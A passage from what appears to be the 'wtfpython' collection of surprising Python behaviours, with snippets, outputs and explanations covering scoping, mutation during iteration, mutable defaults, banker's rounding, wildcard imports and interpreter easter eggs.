with functions that have their separate inner-scopes. The example below illustrates this: ```py def f(x): del(x) print(x) x = 5 y = [5, 4, 3] ``` **Output:** ```py >>> f(x) UnboundLocalError: local variable 'x' referenced before assignment >>> f(y) UnboundLocalError: local variable 'x' referenced before assignment >>> x 5 >>> y [5, 4, 3] ``` * In Python 2.x, the variable name `e` gets assigned to `Exception()` instance, so when you try to print, it prints nothing. **Output (Python 2.x):** ```py >>> e Exception() >>> print e # Nothing is printed! ``` --- ### ▶ The mysterious key type conversion <!-- Example ID: 00f42dd0-b9ef-408d-9e39-1bc209ce3f36 ---> ```py class SomeClass(str): pass some_dict = {'s': 42} ``` **Output:** ```py >>> type(list(some_dict.keys())[0]) str >>> s = SomeClass('s') >>> some_dict[s] = 40 >>> some_dict # expected: Two different keys-value pairs {'s': 40} >>> type(list(some_dict.keys())[0]) str ``` #### 💡 Explanation: * Both the object `s` and the string `"s"` hash to the same value because `SomeClass` inherits the `__hash__` method of `str` class. * `SomeClass("s") == "s"` evaluates to `True` because `SomeClass` also inherits `__eq__` method from `str` class. * Since both the objects hash to the same value and are equal, they are represented by the same key in the dictionary. * For the desired behavior, we can redefine the `__eq__` method in `SomeClass` ```py class SomeClass(str): def __eq__(self, other): return ( type(self) is SomeClass and type(other) is SomeClass and super().__eq__(other) ) # When we define a custom __eq__, Python stops automatically inheriting the # __hash__ method, so we need to define it as well __hash__ = str.__hash__ some_dict = {'s':42} ``` **Output:** ```py >>> s = SomeClass('s') >>> some_dict[s] = 40 >>> some_dict {'s': 40, 's': 42} >>> keys = list(some_dict.keys()) >>> type(keys[0]), type(keys[1]) (__main__.SomeClass, str) ``` --- ### ▶ Let's see if you can guess this? <!-- Example ID: 81aa9fbe-bd63-4283-b56d-6fdd14c9105e ---> ```py a, b = a[b] = {}, 5 ``` **Output:** ```py >>> a {5: ({...}, 5)} ``` #### 💡 Explanation: * According to [Python language reference](https://docs.python.org/3/reference/simple_stmts.html#assignment-statements), assignment statements have the form ``` (target_list "=")+ (expression_list | yield_expression) ``` and > An assignment statement evaluates the expression list (remember that this can be a single expression or a comma-separated list, the latter yielding a tuple) and assigns the single resulting object to each of the target lists, from left to right. * The `+` in `(target_list "=")+` means there can be **one or more** target lists. In this case, target lists are `a, b` and `a[b]` (note the expression list is exactly one, which in our case is `{}, 5`). * After the expression list is evaluated, its value is unpacked to the target lists from **left to right**. So, in our case, first the `{}, 5` tuple is unpacked to `a, b` and we now have `a = {}` and `b = 5`. * `a` is now assigned to `{}`, which is a mutable object. * The second target list is `a[b]` (you may expect this to throw an error because both `a` and `b` have not been defined in the statements before. But remember, we just assigned `a` to `{}` and `b` to `5`). * Now, we are setting the key `5` in the dictionary to the tuple `({}, 5)` creating a circular reference (the `{...}` in the output refers to the same object that `a` is already referencing). Another simpler example of circular reference could be ```py >>> some_list = some_list[0] = [0] >>> some_list [[...]] >>> some_list[0] [[...]] >>> some_list is some_list[0] True >>> some_list[0][0][0][0][0][0] == some_list True ``` Similar is the case in our example (`a[b][0]` is the same object as `a`) * So to sum it up, you can break the example down to ```py a, b = {}, 5 a[b] = a, b ``` And the circular reference can be justified by the fact that `a[b][0]` is the same object as `a` ```py >>> a[b][0] is a True ``` --- ### ▶ Exceeds the limit for integer string conversion ```py >>> # Python 3.10.6 >>> int("2" * 5432) >>> # Python 3.10.8 >>> int("2" * 5432) ``` **Output:** ```py >>> # Python 3.10.6 222222222222222222222222222222222222222222222222222222222222222... >>> # Python 3.10.8 Traceback (most recent call last): ... ValueError: Exceeds the limit (4300) for integer string conversion: value has 5432 digits; use sys.set_int_max_str_digits() to increase the limit. ``` #### 💡 Explanation: This call to `int()` works fine in Python 3.10.6 and raises a ValueError in Python 3.10.8. Note that Python can still work with large integers. The error is only raised when converting between integers and strings. Fortunately, you can increase the limit for the allowed number of digits when you expect an operation to exceed it. To do this, you can use one of the following: - The -X int_max_str_digits command-line flag - The set_int_max_str_digits() function from the sys module - The PYTHONINTMAXSTRDIGITS environment variable [Check the documentation](https://docs.python.org/3/library/stdtypes.html#int-max-str-digits) for more details on changing the default limit if you expect your code to exceed this value. --- ## Section: Slippery Slopes ### ▶ Modifying a dictionary while iterating over it <!-- Example ID: b4e5cdfb-c3a8-4112-bd38-e2356d801c41 ---> ```py x = {0: None} for i in x: del x[i] x[i+1] = None print(i) ``` **Output (Python 2.7- Python 3.5):** ``` 0 1 2 3 4 5 6 7 ``` Yes, it runs for exactly **eight** times and stops. #### 💡 Explanation: * Iteration over a dictionary that you edit at the same time is not supported. * It runs eight times because that's the point at which the dictionary resizes to hold more keys (we have eight deletion entries, so a resize is needed). This is actually an implementation detail. * How deleted keys are handled and when the resize occurs might be different for different Python implementations. * So for Python versions other than Python 2.7 - Python 3.5, the count might be different from 8 (but whatever the count is, it's going to be the same every time you run it). You can find some discussion around this [here](https://github.com/satwikkansal/wtfpython/issues/53) or in [this](https://stackoverflow.com/questions/44763802/bug-in-python-dict) StackOverflow thread. * Python 3.7.6 onwards, you'll see `RuntimeError: dictionary keys changed during iteration` exception if you try to do this. --- ### ▶ Stubborn `del` operation <!-- Example ID: 777ed4fd-3a2d-466f-95e7-c4058e61d78e ---> <!-- read-only --> ```py class SomeClass: def __del__(self): print("Deleted!") ``` **Output:** 1\. ```py >>> x = SomeClass() >>> y = x >>> del x # this should print "Deleted!" >>> del y Deleted! ``` Phew, deleted at last. You might have guessed what saved `__del__` from being called in our first attempt to delete `x`. Let's add more twists to the example. 2\. ```py >>> x = SomeClass() >>> y = x >>> del x >>> y # check if y exists <__main__.SomeClass instance at 0x7f98a1a67fc8> >>> del y # Like previously, this should print "Deleted!" >>> globals() # oh, it didn't. Let's check all our global variables and confirm Deleted! {'__builtins__': <module '__builtin__' (built-in)>, 'SomeClass': <class __main__.SomeClass at 0x7f98a1a5f668>, '__package__': None, '__name__': '__main__', '__doc__': None} ``` Okay, now it's deleted :confused: #### 💡 Explanation: + `del x` doesn’t directly call `x.__del__()`. + When `del x` is encountered, Python deletes the name `x` from current scope and decrements by 1 the reference count of the object `x` referenced. `__del__()` is called only when the object's reference count reaches zero. + In the second output snippet, `__del__()` was not called because the previous statement (`>>> y`) in the interactive interpreter created another reference to the same object (specifically, the `_` magic variable which references the result value of the last non `None` expression on the REPL), thus preventing the reference count from reaching zero when `del y` was encountered. + Calling `globals` (or really, executing anything that will have a non `None` result) caused `_` to reference the new result, dropping the existing reference. Now the reference count reached 0 and we can see "Deleted!" being printed (finally!). --- ### ▶ The out of scope variable <!-- Example ID: 75c03015-7be9-4289-9e22-4f5fdda056f7 ---> 1\. ```py a = 1 def some_func(): return a def another_func(): a += 1 return a ``` 2\. ```py def some_closure_func(): a = 1 def some_inner_func(): return a return some_inner_func() def another_closure_func(): a = 1 def another_inner_func(): a += 1 return a return another_inner_func() ``` **Output:** ```py >>> some_func() 1 >>> another_func() UnboundLocalError: local variable 'a' referenced before assignment >>> some_closure_func() 1 >>> another_closure_func() UnboundLocalError: local variable 'a' referenced before assignment ``` #### 💡 Explanation: * When you make an assignment to a variable in scope, it becomes local to that scope. So `a` becomes local to the scope of `another_func`, but it has not been initialized previously in the same scope, which throws an error. * To modify the outer scope variable `a` in `another_func`, we have to use the `global` keyword. ```py def another_func() global a a += 1 return a ``` **Output:** ```py >>> another_func() 2 ``` * In `another_closure_func`, `a` becomes local to the scope of `another_inner_func`, but it has not been initialized previously in the same scope, which is why it throws an error. * To modify the outer scope variable `a` in `another_inner_func`, use the `nonlocal` keyword. The nonlocal statement is used to refer to variables defined in the nearest outer (excluding the global) scope. ```py def another_func(): a = 1 def another_inner_func(): nonlocal a a += 1 return a return another_inner_func() ``` **Output:** ```py >>> another_func() 2 ``` * The keywords `global` and `nonlocal` tell the python interpreter to not declare new variables and look them up in the corresponding outer scopes. * Read [this](https://sebastianraschka.com/Articles/2014_python_scope_and_namespaces.html) short but an awesome guide to learn more about how namespaces and scope resolution works in Python. --- ### ▶ Deleting a list item while iterating <!-- Example ID: 4cc52d4e-d42b-4e09-b25f-fbf5699b7d4e ---> ```py list_1 = [1, 2, 3, 4] list_2 = [1, 2, 3, 4] list_3 = [1, 2, 3, 4] list_4 = [1, 2, 3, 4] for idx, item in enumerate(list_1): del item for idx, item in enumerate(list_2): list_2.remove(item) for idx, item in enumerate(list_3[:]): list_3.remove(item) for idx, item in enumerate(list_4): list_4.pop(idx) ``` **Output:** ```py >>> list_1 [1, 2, 3, 4] >>> list_2 [2, 4] >>> list_3 [] >>> list_4 [2, 4] ``` Can you guess why the output is `[2, 4]`? #### 💡 Explanation: * It's never a good idea to change the object you're iterating over. The correct way to do so is to iterate over a copy of the object instead, and `list_3[:]` does just that. ```py >>> some_list = [1, 2, 3, 4] >>> id(some_list) 139798789457608 >>> id(some_list[:]) # Notice that python creates new object for sliced list. 139798779601192 ``` **Difference between `del`, `remove`, and `pop`:** * `del var_name` just removes the binding of the `var_name` from the local or global namespace (That's why the `list_1` is unaffected). * `remove` removes the first matching value, not a specific index, raises `ValueError` if the value is not found. * `pop` removes the element at a specific index and returns it, raises `IndexError` if an invalid index is specified. **Why the output is `[2, 4]`?** - The list iteration is done index by index, and when we remove `1` from `list_2` or `list_4`, the contents of the lists are now `[2, 3, 4]`. The remaining elements are shifted down, i.e., `2` is at index 0, and `3` is at index 1. Since the next iteration is going to look at index 1 (which is the `3`), the `2` gets skipped entirely. A similar thing will happen with every alternate element in the list sequence. * Refer to this StackOverflow [thread](https://stackoverflow.com/questions/45946228/what-happens-when-you-try-to-delete-a-list-element-while-iterating-over-it) explaining the example * See also this nice StackOverflow [thread](https://stackoverflow.com/questions/45877614/how-to-change-all-the-dictionary-keys-in-a-for-loop-with-d-items) for a similar example related to dictionaries in Python. --- ### ▶ Lossy zip of iterators * <!-- Example ID: c28ed154-e59f-4070-8eb6-8967a4acac6d ---> ```py >>> numbers = list(range(7)) >>> numbers [0, 1, 2, 3, 4, 5, 6] >>> first_three, remaining = numbers[:3], numbers[3:] >>> first_three, remaining ([0, 1, 2], [3, 4, 5, 6]) >>> numbers_iter = iter(numbers) >>> list(zip(numbers_iter, first_three)) [(0, 0), (1, 1), (2, 2)] # so far so good, let's zip the remaining >>> list(zip(numbers_iter, remaining)) [(4, 3), (5, 4), (6, 5)] ``` Where did element `3` go from the `numbers` list? #### 💡 Explanation: - From Python [docs](https://docs.python.org/3.3/library/functions.html#zip), here's an approximate implementation of zip function, ```py def zip(*iterables): sentinel = object() iterators = [iter(it) for it in iterables] while iterators: result = [] for it in iterators: elem = next(it, sentinel) if elem is sentinel: return result.append(elem) yield tuple(result) ``` - So the function takes in arbitrary number of iterable objects, adds each of their items to the `result` list by calling the `next` function on them, and stops whenever any of the iterable is exhausted. - The caveat here is when any iterable is exhausted, the existing elements in the `result` list are discarded. That's what happened with `3` in the `numbers_iter`. - The correct way to do the above using `zip` would be, ```py >>> numbers = list(range(7)) >>> numbers_iter = iter(numbers) >>> list(zip(first_three, numbers_iter)) [(0, 0), (1, 1), (2, 2)] >>> list(zip(remaining, numbers_iter)) [(3, 3), (4, 4), (5, 5), (6, 6)] ``` The first argument of zip should be the one with fewest elements. --- ### ▶ Loop variables leaking out! <!-- Example ID: ccec7bf6-7679-4963-907a-1cd8587be9ea ---> 1\. ```py for x in range(7): if x == 6: print(x, ': for x inside loop') print(x, ': x in global') ``` **Output:** ```py 6 : for x inside loop 6 : x in global ``` But `x` was never defined outside the scope of for loop... 2\. ```py # This time let's initialize x first x = -1 for x in range(7): if x == 6: print(x, ': for x inside loop') print(x, ': x in global') ``` **Output:** ```py 6 : for x inside loop 6 : x in global ``` 3\. **Output (Python 2.x):** ```py >>> x = 1 >>> print([x for x in range(5)]) [0, 1, 2, 3, 4] >>> print(x) 4 ``` **Output (Python 3.x):** ```py >>> x = 1 >>> print([x for x in range(5)]) [0, 1, 2, 3, 4] >>> print(x) 1 ``` #### 💡 Explanation: - In Python, for-loops use the scope they exist in and leave their defined loop-variable behind. This also applies if we explicitly defined the for-loop variable in the global namespace before. In this case, it will rebind the existing variable. - The differences in the output of Python 2.x and Python 3.x interpreters for list comprehension example can be explained by following change documented in [What’s New In Python 3.0](https://docs.python.org/3/whatsnew/3.0.html) changelog: > "List comprehensions no longer support the syntactic form `[... for var in item1, item2, ...]`. Use `[... for var in (item1, item2, ...)]` instead. Also, note that list comprehensions have different semantics: they are closer to syntactic sugar for a generator expression inside a `list()` constructor, and in particular, the loop control variables are no longer leaked into the surrounding scope." --- ### ▶ Beware of default mutable arguments! <!-- Example ID: 7d42dade-e20d-4a7b-9ed7-16fb58505fe9 ---> ```py def some_func(default_arg=[]): default_arg.append("some_string") return default_arg ``` **Output:** ```py >>> some_func() ['some_string'] >>> some_func() ['some_string', 'some_string'] >>> some_func([]) ['some_string'] >>> some_func() ['some_string', 'some_string', 'some_string'] ``` #### 💡 Explanation: - The default mutable arguments of functions in Python aren't really initialized every time you call the function. Instead, the recently assigned value to them is used as the default value. When we explicitly passed `[]` to `some_func` as the argument, the default value of the `default_arg` variable was not used, so the function returned as expected. ```py def some_func(default_arg=[]): default_arg.append("some_string") return default_arg ``` **Output:** ```py >>> some_func.__defaults__ #This will show the default argument values for the function ([],) >>> some_func() >>> some_func.__defaults__ (['some_string'],) >>> some_func() >>> some_func.__defaults__ (['some_string', 'some_string'],) >>> some_func([]) >>> some_func.__defaults__ (['some_string', 'some_string'],) ``` - A common practice to avoid bugs due to mutable arguments is to assign `None` as the default value and later check if any value is passed to the function corresponding to that argument. Example: ```py def some_func(default_arg=None): if default_arg is None: default_arg = [] default_arg.append("some_string") return default_arg ``` --- ### ▶ Catching the Exceptions <!-- Example ID: b5ca5e6a-47b9-4f69-9375-cda0f8c6755d ---> ```py some_list = [1, 2, 3] try: # This should raise an ``IndexError`` print(some_list[4]) except IndexError, ValueError: print("Caught!") try: # This should raise a ``ValueError`` some_list.remove(4) except IndexError, ValueError: print("Caught again!") ``` **Output (Python 2.x):** ```py Caught! ValueError: list.remove(x): x not in list ``` **Output (Python 3.x):** ```py File "<input>", line 3 except IndexError, ValueError: ^ SyntaxError: invalid syntax ``` #### 💡 Explanation * To add multiple Exceptions to the except clause, you need to pass them as parenthesized tuple as the first argument. The second argument is an optional name, which when supplied will bind the Exception instance that has been raised. Example, ```py some_list = [1, 2, 3] try: # This should raise a ``ValueError`` some_list.remove(4) except (IndexError, ValueError), e: print("Caught again!") print(e) ``` **Output (Python 2.x):** ``` Caught again! list.remove(x): x not in list ``` **Output (Python 3.x):** ```py File "<input>", line 4 except (IndexError, ValueError), e: ^ IndentationError: unindent does not match any outer indentation level ``` * Separating the exception from the variable with a comma is deprecated and does not work in Python 3; the correct way is to use `as`. Example, ```py some_list = [1, 2, 3] try: some_list.remove(4) except (IndexError, ValueError) as e: print("Caught again!") print(e) ``` **Output:** ``` Caught again! list.remove(x): x not in list ``` --- ### ▶ Same operands, different story! <!-- Example ID: ca052cdf-dd2d-4105-b936-65c28adc18a0 ---> 1\. ```py a = [1, 2, 3, 4] b = a a = a + [5, 6, 7, 8] ``` **Output:** ```py >>> a [1, 2, 3, 4, 5, 6, 7, 8] >>> b [1, 2, 3, 4] ``` 2\. ```py a = [1, 2, 3, 4] b = a a += [5, 6, 7, 8] ``` **Output:** ```py >>> a [1, 2, 3, 4, 5, 6, 7, 8] >>> b [1, 2, 3, 4, 5, 6, 7, 8] ``` #### 💡 Explanation: * `a += b` doesn't always behave the same way as `a = a + b`. Classes *may* implement the *`op=`* operators differently, and lists do this. * The expression `a = a + [5,6,7,8]` generates a new list and sets `a`'s reference to that new list, leaving `b` unchanged. * The expression `a += [5,6,7,8]` is actually mapped to an "extend" function that operates on the list such that `a` and `b` still point to the same list that has been modified in-place. --- ### ▶ Name resolution ignoring class scope <!-- Example ID: 03f73d96-151c-4929-b0a8-f74430788324 ---> 1\. ```py x = 5 class SomeClass: x = 17 y = (x for i in range(10)) ``` **Output:** ```py >>> list(SomeClass.y)[0] 5 ``` 2\. ```py x = 5 class SomeClass: x = 17 y = [x for i in range(10)] ``` **Output (Python 2.x):** ```py >>> SomeClass.y[0] 17 ``` **Output (Python 3.x):** ```py >>> SomeClass.y[0] 5 ``` #### 💡 Explanation - Scopes nested inside class definition ignore names bound at the class level. - A generator expression has its own scope. - Starting from Python 3.X, list comprehensions also have their own scope. --- ### ▶ Rounding like a banker * Let's implement a naive function to get the middle element of a list: ```py def get_middle(some_list): mid_index = round(len(some_list) / 2) return some_list[mid_index - 1] ``` **Python 3.x:** ```py >>> get_middle([1]) # looks good 1 >>> get_middle([1,2,3]) # looks good 2 >>> get_middle([1,2,3,4,5]) # huh? 2 >>> len([1,2,3,4,5]) / 2 # good 2.5 >>> round(len([1,2,3,4,5]) / 2) # why? 2 ``` It seems as though Python rounded 2.5 to 2. #### 💡 Explanation: - This is not a float precision error, in fact, this behavior is intentional. Since Python 3.0, `round()` uses [banker's rounding](https://en.wikipedia.org/wiki/Rounding#Rounding_half_to_even) where .5 fractions are rounded to the nearest **even** number: ```py >>> round(0.5) 0 >>> round(1.5) 2 >>> round(2.5) 2 >>> import numpy # numpy does the same >>> numpy.round(0.5) 0.0 >>> numpy.round(1.5) 2.0 >>> numpy.round(2.5) 2.0 ``` - This is the recommended way to round .5 fractions as described in [IEEE 754](https://en.wikipedia.org/wiki/IEEE_754#Rounding_rules). However, the other way (round away from zero) is taught in school most of the time, so banker's rounding is likely not that well known. Furthermore, some of the most popular programming languages (for example: JavaScript, Java, C/C++, Ruby, Rust) do not use banker's rounding either. Therefore, this is still quite special to Python and may result in confusion when rounding fractions. - See the [round() docs](https://docs.python.org/3/library/functions.html#round) or [this stackoverflow thread](https://stackoverflow.com/questions/10825926/python-3-x-rounding-behavior) for more information. - Note that `get_middle([1])` only returned 1 because the index was `round(0.5) - 1 = 0 - 1 = -1`, returning the last element in the list. --- ### ▶ Needles in a Haystack * <!-- Example ID: 52a199b1-989a-4b28-8910-dff562cebba9 ---> I haven't met even a single experience Pythonist till date who has not come across one or more of the following scenarios, 1\. ```py x, y = (0, 1) if True else None, None ``` **Output:** ```py >>> x, y # expected (0, 1) ((0, 1), None) ``` 2\. ```py t = ('one', 'two') for i in t: print(i) t = ('one') for i in t: print(i) t = () print(t) ``` **Output:** ```py one two o n e tuple() ``` 3\. ``` ten_words_list = [ "some", "very", "big", "list", "that" "consists", "of", "exactly", "ten", "words" ] ``` **Output** ```py >>> len(ten_words_list) 9 ``` 4\. Not asserting strongly enough ```py a = "python" b = "javascript" ``` **Output:** ```py # An assert statement with an assertion failure message. >>> assert(a == b, "Both languages are different") # No AssertionError is raised ``` 5\. ```py some_list = [1, 2, 3] some_dict = { "key_1": 1, "key_2": 2, "key_3": 3 } some_list = some_list.append(4) some_dict = some_dict.update({"key_4": 4}) ``` **Output:** ```py >>> print(some_list) None >>> print(some_dict) None ``` 6\. ```py def some_recursive_func(a): if a[0] == 0: return a[0] -= 1 some_recursive_func(a) return a def similar_recursive_func(a): if a == 0: return a a -= 1 similar_recursive_func(a) return a ``` **Output:** ```py >>> some_recursive_func([5, 0]) [0, 0] >>> similar_recursive_func(5) 4 ``` #### 💡 Explanation: * For 1, the correct statement for expected behavior is `x, y = (0, 1) if True else (None, None)`. * For 2, the correct statement for expected behavior is `t = ('one',)` or `t = 'one',` (missing comma) otherwise the interpreter considers `t` to be a `str` and iterates over it character by character. * `()` is a special token and denotes empty `tuple`. * In 3, as you might have already figured out, there's a missing comma after 5th element (`"that"`) in the list. So by implicit string literal concatenation, ```py >>> ten_words_list ['some', 'very', 'big', 'list', 'thatconsists', 'of', 'exactly', 'ten', 'words'] ``` * No `AssertionError` was raised in 4th snippet because instead of asserting the individual expression `a == b`, we're asserting entire tuple. The following snippet will clear things up, ```py >>> a = "python" >>> b = "javascript" >>> assert a == b Traceback (most recent call last): File "<stdin>", line 1, in <module> AssertionError >>> assert (a == b, "Values are not equal") <stdin>:1: SyntaxWarning: assertion is always true, perhaps remove parentheses? >>> assert a == b, "Values are not equal" Traceback (most recent call last): File "<stdin>", line 1, in <module> AssertionError: Values are not equal ``` * As for the fifth snippet, most methods that modify the items of sequence/mapping objects like `list.append`, `dict.update`, `list.sort`, etc. modify the objects in-place and return `None`. The rationale behind this is to improve performance by avoiding making a copy of the object if the operation can be done in-place (Referred from [here](https://docs.python.org/3/faq/design.html#why-doesn-t-list-sort-return-the-sorted-list)). * Last one should be fairly obvious, mutable object (like `list`) can be altered in the function, and the reassignment of an immutable (`a -= 1`) is not an alteration of the value. * Being aware of these nitpicks can save you hours of debugging effort in the long run. --- ### ▶ Splitsies * <!-- Example ID: ec3168ba-a81a-4482-afb0-691f1cc8d65a ---> ```py >>> 'a'.split() ['a'] # is same as >>> 'a'.split(' ') ['a'] # but >>> len(''.split()) 0 # isn't the same as >>> len(''.split(' ')) 1 ``` #### 💡 Explanation: - It might appear at first that the default separator for split is a single space `' '`, but as per the [docs](https://docs.python.org/3/library/stdtypes.html#str.split) > If sep is not specified or is `None`, a different splitting algorithm is applied: runs of consecutive whitespace are regarded as a single separator, and the result will contain no empty strings at the start or end if the string has leading or trailing whitespace. Consequently, splitting an empty string or a string consisting of just whitespace with a None separator returns `[]`. > If sep is given, consecutive delimiters are not grouped together and are deemed to delimit empty strings (for example, `'1,,2'.split(',')` returns `['1', '', '2']`). Splitting an empty string with a specified separator returns `['']`. - Noticing how the leading and trailing whitespaces are handled in the following snippet will make things clear, ```py >>> ' a '.split(' ') ['', 'a', ''] >>> ' a '.split() ['a'] >>> ''.split(' ') [''] ``` --- ### ▶ Wild imports * <!-- Example ID: 83deb561-bd55-4461-bb5e-77dd7f411e1c ---> <!-- read-only --> ```py # File: module.py def some_weird_name_func_(): print("works!") def _another_weird_name_func(): print("works!") ``` **Output** ```py >>> from module import * >>> some_weird_name_func_() "works!" >>> _another_weird_name_func() Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name '_another_weird_name_func' is not defined ``` #### 💡 Explanation: - It is often advisable to not use wildcard imports. The first obvious reason for this is, in wildcard imports, the names with a leading underscore don't get imported. This may lead to errors during runtime. - Had we used `from ... import a, b, c` syntax, the above `NameError` wouldn't have occurred. ```py >>> from module import some_weird_name_func_, _another_weird_name_func >>> _another_weird_name_func() works! ``` - If you really want to use wildcard imports, then you'd have to define the list `__all__` in your module that will contain a list of public objects that'll be available when we do wildcard imports. ```py __all__ = ['_another_weird_name_func'] def some_weird_name_func_(): print("works!") def _another_weird_name_func(): print("works!") ``` **Output** ```py >>> _another_weird_name_func() "works!" >>> some_weird_name_func_() Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name 'some_weird_name_func_' is not defined ``` --- ### ▶ All sorted? * <!-- Example ID: e5ff1eaf-8823-4738-b4ce-b73f7c9d5511 --> ```py >>> x = 7, 8, 9 >>> sorted(x) == x False >>> sorted(x) == sorted(x) True >>> y = reversed(x) >>> sorted(y) == sorted(y) False ``` #### 💡 Explanation: - The `sorted` method always returns a list, and comparing lists and tuples always returns `False` in Python. - ```py >>> [] == tuple() False >>> x = 7, 8, 9 >>> type(x), type(sorted(x)) (tuple, list) ``` - Unlike `sorted`, the `reversed` method returns an iterator. Why? Because sorting requires the iterator to be either modified in-place or use an extra container (a list), whereas reversing can simply work by iterating from the last index to the first. - So during comparison `sorted(y) == sorted(y)`, the first call to `sorted()` will consume the iterator `y`, and the next call will just return an empty list. ```py >>> x = 7, 8, 9 >>> y = reversed(x) >>> sorted(y), sorted(y) ([7, 8, 9], []) ``` --- ### ▶ Midnight time doesn't exist? <!-- Example ID: 1bce8294-5619-4d70-8ce3-fe0bade690d1 ---> ```py from datetime import datetime midnight = datetime(2018, 1, 1, 0, 0) midnight_time = midnight.time() noon = datetime(2018, 1, 1, 12, 0) noon_time = noon.time() if midnight_time: print("Time at midnight is", midnight_time) if noon_time: print("Time at noon is", noon_time) ``` **Output (< 3.5):** ```py ('Time at noon is', datetime.time(12, 0)) ``` The midnight time is not printed. #### 💡 Explanation: Before Python 3.5, the boolean value for `datetime.time` object was considered to be `False` if it represented midnight in UTC. It is error-prone when using the `if obj:` syntax to check if the `obj` is null or some equivalent of "empty." --- --- ## Section: The Hidden treasures! This section contains a few lesser-known and interesting things about Python that most beginners like me are unaware of (well, not anymore). ### ▶ Okay Python, Can you make me fly? <!-- Example ID: a92f3645-1899-4d50-9721-0031be4aec3f ---> Well, here you go ```py import antigravity ``` **Output:** Sshh... It's a super-secret. #### 💡 Explanation: + `antigravity` module is one of the few easter eggs released by Python developers. + `import antigravity` opens up a web browser pointing to the [classic XKCD comic](https://xkcd.com/353/) about Python. + Well, there's more to it. There's **another easter egg inside the easter egg**. If you look at the [code](https://github.com/python/cpython/blob/master/Lib/antigravity.py#L7-L17), there's a function defined that purports to implement the [XKCD's geohashing algorithm](https://xkcd.com/426/). --- ### ▶ `goto`, but why? <!-- Example ID: 2aff961e-7fa5-4986-a18a-9e5894bd89fe ---> ```py from goto import goto, label for i in range(9): for j in range(9): for k in range(9): print("I am trapped, please rescue!") if k == 2: goto .breakout # breaking out from a deeply nested loop label .breakout print("Freedom!") ``` **Output (Python 2.3):** ```py I am trapped, please rescue! I am trapped, please rescue! Freedom! ``` #### 💡 Explanation: - A working version of `goto` in Python was [announced](https://mail.python.org/pipermail/python-announce-list/2004-April/002982.html) as an April Fool's joke on 1st April 2004. - Current versions of Python do not have this module. - Although it works, but please don't use it. Here's the [reason](https://docs.python.org/3/faq/design.html#why-is-there-no-goto) to why `goto` is not present in Python. --- ### ▶ Brace yourself! <!-- Example ID: 5c0c75f2-ddd9-4da3-ba49-c4be7ec39acf ---> If you are one of the people who doesn't like using whitespace in Python to denote scopes, you can use the C-style {} by importing, ```py from __future__ import braces ``` **Output:** ```py File "some_file.py", line 1 from __future__ import braces SyntaxError: not a chance ``` Braces? No way! If you think that's disappointing, use Java. Okay, another surprising thing, can you find where's the `SyntaxError` raised in `__future__` module [code](https://github.com/python/cpython/blob/master/Lib/__future__.py)? #### 💡 Explanation: + The `__future__` module is normally used to provide features from future versions of Python. The "future" in this specific context is however, ironic. + This is an easter egg concerned with the community's feelings on this issue. + The code is actually present [here](https://github.com/python/cpython/blob/025eb98dc0c1dc27404df6c544fc2944e0fa9f3a/Python/future.c#L49) in `future.c` file. + When the CPython compiler encounters a [future statement](https://docs.python.org/3.3/reference/simple_stmts.html#future-statements), it first runs the appropriate code in `future.c` before treating it as a normal import statement. --- ### ▶ Let's meet Friendly Language Uncle For Life <!-- Example ID: 6427fae6-e959-462d-85da-ce4c94ce41be ---> **Output (Python 3.x)** ```py >>> from __future__ import barry_as_FLUFL >>> "Ruby" != "Python" # there's no doubt about it File "some_file.py", line 1 "Ruby" != "Python" ^ SyntaxError: invalid syntax >>> "Ruby" <> "Python" True ``` There we go. #### 💡 Explanation: - This is relevant to [PEP-401](https://www.python.org/dev/peps/pep-0401/) released on April 1, 2009 (now you know, what it means). - Quoting from the PEP-401 > Recognized that the != inequality operator in Python 3.0 was a horrible, finger-pain inducing mistake, the FLUFL reinstates the <> diamond operator as the sole spelling. - There were more things that Uncle Barry had to share in the PEP; you can read them [here](https://www.python.org/dev/peps/pep-0401/). - It works well in an interactive environment, but it will raise a `SyntaxError` when you run via python file (see this [issue](https://github.com/satwikkansal/wtfpython/issues/94)). However, you can wrap the statement inside an `eval` or `compile` to get it working, ```py from __future__ import barry_as_FLUFL print(eval('"Ruby" <> "Python"')) ``` --- ### ▶ Even Python understands that love is complicated <!-- Example ID: b93cad9e-d341-45d1-999c-fcdce65bed25 ---> ```py import this ``` Wait, what's **this**? `this` is love :heart: **Output:** ``` The Zen of Python, by Tim Peters Beautiful is better than ugly. Explicit is better than implicit. Simple is better than complex. Complex is better than complicated. Flat is better than nested. Sparse is better than dense. Readability counts. Special cases aren't special enough to break the rules. Although practicality beats purity. Errors should never pass silently. Unless explicitly silenced. In the face of ambiguity, refuse the temptation to guess. There should be one-- and preferably only one --obvious way to do it. Although that way may not be obvious at first unless you're Dutch. Now is better than never. Although never is often better than *right* now. If the implementation is hard to explain, it's a bad idea. If the implementation is easy to explain, it may be a good idea. Namespaces are one honking great idea -- let's do more of those! ``` It's the Zen of Python! ```py >>> love = this >>> this is love True >>> love is True False >>> love is False False >>> love is not True or False True >>> love is not True or False; love is love # Love is complicated True ``` #### 💡 Explanation: * `this` module in Python is an easter egg for The Zen Of Python ([PEP 20](https://www.python.org/dev/peps/pep-0020)). * And if you think that's already interesting enough, check out the implementation of [this.py](https://hg.python.org/cpython/file/c3896275c0f6/Lib/this.py). Interestingly, **the code for the Zen violates itself** (and that's probably the only place where this happens). * Regarding the statement `love is not True or False; love is love`, ironic but it's self-explanatory (if not, please see the examples related to `is` and `is not` operators). --- ### ▶ Yes, it exists! <!-- Example ID: 4286db3d-1ea7-47c9-8fb6-a9a04cac6e49 ---> **The `else` clause for loops.** One typical example might be: ```py def does_exists_num(l, to_find): for num in l: if num == to_find: print("Exists!") break else: print("Does not exist") ``` **Output:** ```py >>> some_list = [1, 2, 3, 4, 5] >>> does_exists_num(some_list, 4) Exists! >>> does_exists_num(some_list, -1) Does not exist ``` **The `else` clause in exception handling.** An example, ```py try: pass except: print("Exception occurred!!!") else: print("Try block executed successfully...") ``` **Output:** ```py Try block executed successfully... ``` #### 💡 Explanation: - The `else` clause after a loop is executed only when there's no explicit `break` after all the iterations. You can think of it as a "nobreak" clause. - `else` clause after a try block is also called "completion clause" as reaching the `else` clause in a `try` statement means that the try block actually completed successfully. --- ### ▶ Ellipsis * <!-- Example ID: 969b7100-ab3d-4a7d-ad7d-a6be16181b2b ---> ```py def some_func(): Ellipsis ``` **Output** ```py >>> some_func() # No output, No Error >>> SomeRandomString Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name 'SomeRandomString' is not defined 